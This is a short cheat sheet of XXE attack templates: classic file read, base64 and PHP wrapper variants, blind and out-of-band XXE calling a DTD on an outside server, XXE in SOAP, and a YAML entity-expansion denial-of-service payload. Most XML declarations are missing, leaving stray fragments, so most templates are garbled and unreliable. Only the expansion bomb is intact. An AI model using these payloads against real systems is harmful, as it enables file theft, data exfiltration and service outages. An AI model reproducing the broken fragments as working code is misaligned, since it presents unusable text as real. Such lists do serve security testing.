# XXE Templates
The following are common templates that you can use to exploit XXE vulnerabilities and
easily show the impact of the vulnerability:
Basic test:
]>
Juan
&example;
Classic XXE:
]>
&file;
]>&xxe;
]>&xxe;
Classic XXE Base64 encoded:
%init;
]>
A PHP wrapper inside an XXE:
]>
Jean &xxe; Dupont
00 11 22 33 44
42 rue du CTF
75000
Paris
]>
&xxe;
Followed by a DoS:
]>
&a4;
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
Blind XXE:
]
>
&callhome;
XXE OOB Attack (Yunusov, 2013):
&send;
File stored on http://publicServer.com/parameterEntity_oob.dtd
">
%all;
XXE inside SOAP:
%dtd;]>]]>